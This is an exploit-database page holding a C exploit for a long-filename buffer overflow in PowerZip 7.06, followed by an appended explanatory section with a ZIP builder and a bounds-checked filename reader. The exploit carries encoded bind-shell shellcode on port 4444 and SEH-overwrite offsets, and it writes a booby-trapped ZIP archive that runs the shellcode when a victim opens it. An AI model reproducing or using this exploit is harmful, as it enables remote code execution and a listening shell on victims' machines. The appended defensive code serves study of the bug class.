0day.today - Biggest Exploit Database in the World.
PowerZip <= 7.06.3895 Long Filename Handling Buffer Overflow Exploit
====================================================================

/*
 * PowerZip 7.06 Exploit by bratax (http://www.bratax.be/)
 *
 * Just a quick one as I was able to reuse most of my zipcentral exploit code..
 * Greetz to everyone I like... (special greetz to mobbie and DT as they were sad
 * I didn't mention them the previous time :p)
 *
 * ******************************
 * Some technical info:
 * - Original advisory + vulnerability details are available here:
 *   http://vuln.sg/powerzip706-en.html (I didn't notice anything like DEP though?)
 * - some code might look weird in this source.. (e.g. shellcode, offsets, ...)
 *   this is because a lot of values are changed in memory.. so use your favorite
 *   debugger to see the real values and codes
 * - tested on XP Pro English (SP2) and XP Home Dutch (SP2)
 * !! sometimes it works, sometimes it doesn't... (throws exception E06D7363 when
 *   it doesn't)... just try over and over and over..... and over.... and over...
 *   and over again till it works.. :p sometimes it works 10 times in a row and
 *   sometimes you have to try 10 times before it works 1 time..
 *   I'm going to investigate this weekend why this is happening..
 *   but now it's time to relax and drink some beers :)
 */

#include <stdio.h>
#include <string.h>

unsigned char scode[]= //bindshell on p4444 (thx metasploit)
"\x89\x03\x59\x89\x05\x8a\x9b\x98\x98\x98\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38"
"\x4e\x46\x46\x42\x46\x42\x4b\x58\x45\x44\x4e\x43\x4b\x38\x4e\x37"
"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x38"
"\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x38\x46\x43\x4b\x58"
"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x52\x45\x57\x45\x4e\x4b\x48"
"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54"
"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x52\x4b\x58"
"\x49\x48\x4e\x56\x46\x32\x4e\x31\x41\x36\x43\x4c\x41\x43\x4b\x4d"
"\x46\x56\x4b\x48\x43\x44\x42\x53\x4b\x48\x42\x44\x4e\x50\x4b\x38"
"\x42\x37\x4e\x41\x4d\x4a\x4b\x48\x42\x44\x4a\x30\x50\x45\x4a\x36"
"\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x46"
"\x43\x45\x48\x56\x4a\x46\x43\x43\x44\x33\x4a\x56\x47\x37\x43\x37"
"\x44\x43\x4f\x55\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e"
"\x48\x56\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x36\x44\x50"
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x45"
"\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x35\x43\x35\x43\x35\x43\x54"
"\x43\x55\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x41"
"\x4e\x45\x48\x56\x43\x45\x49\x48\x41\x4e\x45\x59\x4a\x46\x46\x4a"
"\x4c\x31\x42\x57\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41"
"\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32"
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d"
"\x4a\x56\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x45\x4f\x4f\x48\x4d"
"\x42\x35\x46\x55\x46\x55\x45\x55\x4f\x4f\x42\x4d\x43\x39\x4a\x36"
"\x47\x4e\x49\x47\x48\x4c\x49\x57\x47\x45\x4f\x4f\x48\x4d\x45\x55"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x56\x46\x36\x48\x36\x4a\x56\x43\x46"
"\x4d\x36\x49\x48\x45\x4e\x4c\x46\x42\x45\x49\x35\x49\x32\x4e\x4c"
"\x49\x38\x47\x4e\x4c\x56\x46\x34\x49\x58\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x34\x4e\x52"
"\x43\x39\x4d\x38\x4c\x37\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x37\x46\x44\x4f\x4f"
"\x48\x4d\x4b\x45\x47\x45\x44\x55\x41\x35\x41\x45\x41\x35\x4c\x36"
"\x41\x30\x41\x55\x41\x45\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x46"
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x47\x45\x4e\x4f"
"\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"
"\x4a\x56\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a";

/* ZIP local file header (30 bytes). sizeof(head) deliberately includes the
   string's terminating NUL: it is the final byte of the 2-byte extra-field
   length. The filename length field is 0x0814 = 2068 = 2064 (overflow) + 4 (".txt"). */
char head[] =
"\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00"
"\xB7\xAC\xCE\x34\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x14\x08\x00";

/* ".txt" that ends the first long filename, then the central directory header
   (46 bytes, again completed by the trailing NUL; filename length 0x0814). */
char middle[] =
"\x2e\x74\x78\x74\x50\x4B\x01\x02\x14\x00"
"\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x14\x08\x00\x00\x00\x00\x00\x00"
"\x01\x00\x24\x00\x00\x00\x00\x00\x00";

/* ".txt" that ends the second long filename, then the end-of-central-directory
   record: 1 entry, central dir size 0x0842 = 46 + 2068, offset 0x0832 = 30 + 2068. */
char tail[] =
"\x2e\x74\x78\x74\x50\x4B\x05\x06\x00\x00"
"\x00\x00\x01\x00\x01\x00\x42\x08\x00\x00"
"\x32\x08\x00\x00\x00";

int main(int argc, char *argv[])
{
    char overflow[2064]; // exactly 2064....... wonder why?
    FILE *vuln;

    if (argc < 2) {
        printf("PowerZip 7.06 Buffer Overflow Exploit.\n");
        printf("Coded by bratax (http://www.bratax.be/).\n");
        printf("Usage: %s <outputfile>\n", argv[0]);
        return 0;
    }

    /* "wb": binary mode, so a Windows C runtime cannot rewrite a 0x0A byte
       in the archive as CR LF. */
    vuln = fopen(argv[1], "wb");
    if (!vuln) {
        perror(argv[1]);
        return 1;
    }

    //build overflow buffer here.
    memset(overflow, 0x32, sizeof(overflow)); //fill with crap
    //memcpy(overflow+787, scode, 483);
    memcpy(overflow+787, scode, 709);                   // shellcode, 709 bytes
    memcpy(overflow+1620, "\x41\x49\x89\x04", 4);       // jmp over pop pop ret (next-SEH slot)
    memcpy(overflow+1624, "\x02\x12\x01\x61", 4);       // pop pop ret @ 0x61011202 (SEH handler slot)
    memcpy(overflow+1628, "\x82\xFD\x81\x98\x98", 5);   // jmp back to shellcode

    //Write file: local header + long name, central dir + same long name, EOCD
    fwrite(head, 1, sizeof(head), vuln);
    fwrite(overflow, 1, sizeof(overflow), vuln);
    fwrite(middle, 1, sizeof(middle), vuln);
    fwrite(overflow, 1, sizeof(overflow), vuln);
    fwrite(tail, 1, sizeof(tail), vuln);
    fclose(vuln);

    printf("File written.\nOpen with PowerZip 7.06 to exploit.\n");
    return 0;
}

# 0day.today [2024-12-24] #
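The exploit above hand-assembles its ZIP with hardcoded length fields (filename length 0x0814, central directory size 0x0842 and offset 0x0832). The following is an added example, not bratax's code and not PowerZip's (which is closed source): it derives those fields for any filename length, reproduces the exploit's exact 4234-byte layout for a 2068-byte name, and contrasts the bug class (a reader that trusts the 16-bit filename-length field and copies into a fixed buffer) with a checked reader. The reader, its 260-byte buffer, the `zip_*` function names and the vulnerable snippet quoted in the comment are hypothetical illustrations, not a description of PowerZip's implementation.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Fixed-size parts of the three records the exploit emits (PKZIP APPNOTE). */
#define LFH_SIZE  30   /* local file header, followed by the filename */
#define CDH_SIZE  46   /* central directory header, followed by the filename */
#define EOCD_SIZE 22   /* end-of-central-directory record (no comment) */
#define NAME_MAX  260  /* hypothetical fixed filename buffer in a reader */

typedef enum { ZIP_OK = 0, ZIP_BAD_SIG, ZIP_TRUNCATED, ZIP_NAME_TOO_LONG } zip_status;

static void put16(uint8_t *p, unsigned v) { p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; }
static void put32(uint8_t *p, uint32_t v) { put16(p, v & 0xffff); put16(p + 2, v >> 16); }
static unsigned get16(const uint8_t *p) { return p[0] | (unsigned)p[1] << 8; }
static uint32_t get32(const uint8_t *p) { return get16(p) | (uint32_t)get16(p + 2) << 16; }

/* Build a one-entry stored archive holding an empty file whose name is name_len
 * bytes, laid out like the exploit's output: LFH+name, CDH+name, EOCD. The
 * fields the exploit hardcodes (0x0814, 0x0842, 0x0832) are computed here.
 * Returns a malloc'd buffer; *out_len receives the total size. */
uint8_t *zip_build_one(const uint8_t *name, unsigned name_len, size_t *out_len)
{
    size_t cd_off  = LFH_SIZE + (size_t)name_len;   /* central dir follows LFH+name */
    size_t cd_size = CDH_SIZE + (size_t)name_len;
    size_t total   = cd_off + cd_size + EOCD_SIZE;
    uint8_t *z = calloc(total, 1);                  /* zero: flags, method, crc, sizes */
    if (!z) return NULL;

    uint8_t *p = z;                                 /* local file header */
    memcpy(p, "PK\x03\x04", 4);
    put16(p + 4, 20);                               /* version needed: 2.0 */
    put16(p + 26, name_len);                        /* filename length */
    memcpy(p + LFH_SIZE, name, name_len);

    p = z + cd_off;                                 /* central directory header */
    memcpy(p, "PK\x01\x02", 4);
    put16(p + 4, 20);                               /* version made by */
    put16(p + 6, 20);                               /* version needed */
    put16(p + 28, name_len);                        /* filename length */
    put32(p + 42, 0);                               /* offset of the LFH */
    memcpy(p + CDH_SIZE, name, name_len);

    p = z + cd_off + cd_size;                       /* end of central directory */
    memcpy(p, "PK\x05\x06", 4);
    put16(p + 8, 1);                                /* entries on this disk */
    put16(p + 10, 1);                               /* entries total */
    put32(p + 12, (uint32_t)cd_size);
    put32(p + 16, (uint32_t)cd_off);
    *out_len = total;
    return z;
}

/* The bug class the exploit targets is a reader of the shape (hypothetical,
 * not PowerZip's code):
 *     char fname[NAME_MAX];
 *     memcpy(fname, buf + LFH_SIZE, get16(buf + 26));   // 2068 bytes into 260
 * This checked version bounds the copy by the destination size and by the
 * bytes actually present in the archive before touching the name. */
zip_status zip_read_first_name(const uint8_t *buf, size_t len, char out[NAME_MAX])
{
    if (len < LFH_SIZE || memcmp(buf, "PK\x03\x04", 4) != 0) return ZIP_BAD_SIG;
    unsigned name_len = get16(buf + 26);
    if (name_len >= NAME_MAX) return ZIP_NAME_TOO_LONG;    /* the missing check */
    if (name_len > len - LFH_SIZE) return ZIP_TRUNCATED;
    memcpy(out, buf + LFH_SIZE, name_len);
    out[name_len] = '\0';
    return ZIP_OK;
}

/* Read the EOCD and confirm the central directory it points at lies inside the
 * buffer and starts with a PK\1\2 record. Returns 1 if consistent. */
int zip_check_eocd(const uint8_t *buf, size_t len, uint32_t *cd_off, uint32_t *cd_size)
{
    if (len < EOCD_SIZE) return 0;
    const uint8_t *e = buf + len - EOCD_SIZE;
    if (memcmp(e, "PK\x05\x06", 4) != 0) return 0;
    *cd_size = get32(e + 12);
    *cd_off  = get32(e + 16);
    if ((uint64_t)*cd_off + *cd_size > len - EOCD_SIZE) return 0;
    return memcmp(buf + *cd_off, "PK\x01\x02", 4) == 0;
}

/* Constructed input: build an archive whose name is name_len bytes of '2' (the
 * exploit's 0x32 filler), run both checks, and return the reader's verdict.
 * The layout numbers come back through the pointers. */
zip_status zip_roundtrip(unsigned name_len, uint32_t *cd_off, uint32_t *cd_size, size_t *total)
{
    uint8_t *name = malloc(name_len ? name_len : 1);
    memset(name, '2', name_len);
    uint8_t *z = zip_build_one(name, name_len, total);
    free(name);
    if (!z) return ZIP_TRUNCATED;
    char fname[NAME_MAX];
    zip_status st = zip_check_eocd(z, *total, cd_off, cd_size)
                  ? zip_read_first_name(z, *total, fname) : ZIP_BAD_SIG;
    free(z);
    return st;
}

int main(void)
{
    uint32_t off, sz; size_t total;
    zip_status st = zip_roundtrip(2068, &off, &sz, &total);   /* the exploit's name length */
    printf("2068-byte name: %zu bytes, cd_off=0x%x cd_size=0x%x, reader=%d\n", total, off, sz, st);
    st = zip_roundtrip(5, &off, &sz, &total);
    printf("5-byte name: %zu bytes, reader=%d\n", total, st);
    return 0;
}
```

For the 2068-byte name the builder yields cd_off 0x832, cd_size 0x842 and a 4234-byte file, the same numbers the exploit's `head`, `middle` and `tail` arrays carry (30 + 2064 + 50 + 2064 + 26), while the checked reader refuses the name instead of copying it.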